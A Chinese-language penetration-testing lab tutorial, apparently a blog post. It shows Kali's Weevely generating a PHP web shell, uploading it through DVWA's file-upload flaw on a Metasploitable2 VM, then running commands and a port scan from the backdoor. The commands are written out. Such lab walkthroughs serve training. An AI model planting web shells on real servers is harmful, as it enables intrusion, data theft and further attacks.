Kali渗透测试:通过Web应用程序实现远程控制

简介: Kali渗透测试:通过Web应用程序实现远程控制

Kali渗透测试:通过Web应用程序实现远程控制
我们所接触的PHP、JSP这样的语言主要是用来开发Web应用程序的,但其实他们的功能十分强大,也可以实现远程控制的功能。我们经常听说的“网页木马”指的就是用PHP、JSP等Web开发语言完成的。这种“网页木马”的特点就是无须考虑被渗透目标的操作系统的类型,只需要考虑Web应用程序的类型,例如攻击目标是一个PHP语言编写的网站, 那么就需要使用PHP语言编写的木马。

目前有很多工具都提供了自动生成木马的功能, 例如国内十分流行的“中国菜刀” “中国蚁剑” “冰蝎” 等。这里我们以Kali自带的内置工具Weevely为例, 它是一个专门用来生成PHP语言木马的工具,同时也提供了丰富的管理功能。

这里我们还需要借助metasplotibale2这个靶机中的DVWA, 它提供了一个文件上传漏洞, 我们将利用这个漏洞将Weevely生成的木马上传并运行, 来演示Weevely的功能。上传漏洞广泛存在于各种Web应用程序中, 而且后果极为严重。攻击者往往会利用这个漏洞想Web服务器中上传一个携带恶意代码的文件, 并设法在Web服务器上运行恶意代码。攻击者可能会将“钓鱼”页面或者挖矿“木马”注入到Web应用程序中, 或者直接破坏服务器中的信息,再或者盗取敏感信息。

实 验 环 境
VMware Workstation 16 PRO

操作机:Linux kali 5.10.0 IP (192.168.68.125)

靶机:Metasploitable2-Linux IP (192.168.68.205)

DVWA这个漏洞平台,这里不做赘述,感兴趣的可以自行搜索一下。

操 作 步 骤
1. 登录Metasploitable2-Linux靶机页面
在Kali系统的浏览器地址栏输入http://192.168.68.205,进入靶机的页面,如下图所示:

image.png

2. 登录DVWA页面
进入DVWA页面,输入用户名和密码,然后调整安全等级(DVWA Security)为low并提交,然后点击upload,如下图所示:
image.png

3. 生成恶意代码
现在需要在操作机(Kali)中生成一段恶意代码,但是这段代码不能是常见的exe或者Linux操作系统下的可执行文件,因为我们无法让它们在服务器中运行起来。但是目标服务器中使用了PHP解析器,所以我们可以使用由PHP语言编写的恶意代码,然后目标服务器会像执行其他文件一样来启动它。利用Weevely生成PHP恶意代码,命令如下:

┌──(kali㉿kali)-[~]
└─$ weevely generate 123456 /home/kali/Downloads/testweb.php
Generated '/home/kali/Downloads/testweb.php' with password '123456' of 754 byte size.

生成的木马位于/home/kali/Downloads目录下,如下图所示:

image.png

4. 在靶机DVWA上传PHP木马
在靶机DVWA的上传漏洞页面,点击Choose File,选择test.php木马文件,然后点击upload上传,提交成功。结果如下图所示:

image.png

5. Weevely连接“后门”
使用weevely连接这个“后门”的命令格式如下:

weevely 木马 URL 木马密码

如上图红框中所示,该木马的url应该为http://192.168.68.205/dvwa/hackable/uploads/testweb.php, 所以在操作机中应该执行如下命令:

┌──(kali㉿kali)-[~]
└─$ weevely http://192.168.68.205/dvwa/hackable/uploads/testweb.php 123456

[+] weevely 4.0.1

[+] Target:    192.168.68.205
[+] Session:    /home/kali/.weevely/sessions/192.168.68.205/testweb_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

使用help可以查看当前可以使用的命令,如下图所示:

image.png

上图中显示部分命令,这里使用system_info 命令,执行结果如下图所示:

image.png

使用audit_filesystem查看目标系统的文件信息,如下图所示:

image.png

或者利用这台被渗透的服务器去进行扫描操作,例如利用它去查看192.168.68.1(路由器)设备的80端口是否开放,如下图所示:

image.png

相关文章
|
1月前
|
Web App开发 前端开发 JavaScript
探索Python科学计算的边界:利用Selenium进行Web应用性能测试与优化
【10月更文挑战第6天】随着互联网技术的发展,Web应用程序已经成为人们日常生活和工作中不可或缺的一部分。这些应用不仅需要提供丰富的功能,还必须具备良好的性能表现以保证用户体验。性能测试是确保Web应用能够快速响应用户请求并处理大量并发访问的关键步骤之一。本文将探讨如何使用Python结合Selenium来进行Web应用的性能测试,并通过实际代码示例展示如何识别瓶颈及优化应用。
99 5
|
1月前
|
安全 测试技术 数据库
维护的Web应用程序
【10月更文挑战第4天】维护的Web应用程序
47 4
|
19天前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
20天前
|
数据可视化 数据库 开发者
使用Dash构建交互式Web应用程序
【10月更文挑战第16天】本文介绍了使用Python的Dash框架构建交互式Web应用程序的方法。Dash结合了Flask、React和Plotly等技术,让开发者能够快速创建功能丰富的数据可视化应用。文章从安装Dash开始,逐步介绍了创建简单应用程序、添加交互元素、部署应用程序以及集成更多功能的步骤,并提供了代码示例。通过本文,读者可以掌握使用Dash构建交互式Web应用程序的基本技巧和高级功能。
36 3
|
12天前
|
Web App开发 测试技术 数据安全/隐私保护
自动化测试的魔法:使用Python进行Web应用测试
【10月更文挑战第32天】本文将带你走进自动化测试的世界,通过Python和Selenium库的力量,展示如何轻松对Web应用进行自动化测试。我们将一起探索编写简单而强大的测试脚本的秘诀,并理解如何利用这些脚本来确保我们的软件质量。无论你是测试新手还是希望提升自动化测试技能的开发者,这篇文章都将为你打开一扇门,让你看到自动化测试不仅可行,而且充满乐趣。
|
1月前
|
JavaScript 前端开发
如何使用Vue.js构建响应式Web应用程序
【10月更文挑战第9天】如何使用Vue.js构建响应式Web应用程序
|
1月前
|
前端开发 JavaScript 测试技术
构建响应式Web应用程序:React实战指南
【10月更文挑战第9天】构建响应式Web应用程序:React实战指南
|
15天前
|
Web App开发 设计模式 JavaScript
自动化测试之美:如何利用Selenium实现Web应用的高效测试
【10月更文挑战第29天】在软件开发的世界中,测试是确保产品质量的关键步骤。本文将带你了解如何使用Selenium这一强大的自动化测试工具,提高Web应用测试的效率和准确性。通过实际案例,我们将探索Selenium的核心功能及其在现代软件开发中的应用,旨在帮助读者掌握自动化测试的精髓,从而提升软件测试工作的整体效能。
12 0
|
1月前
|
存储 JavaScript 前端开发
如何使用React和Redux构建现代化Web应用程序
【10月更文挑战第4天】如何使用React和Redux构建现代化Web应用程序
|
1月前
|
设计模式 测试技术 持续交付
开发复杂Web应用程序
【10月更文挑战第3天】开发复杂Web应用程序
38 2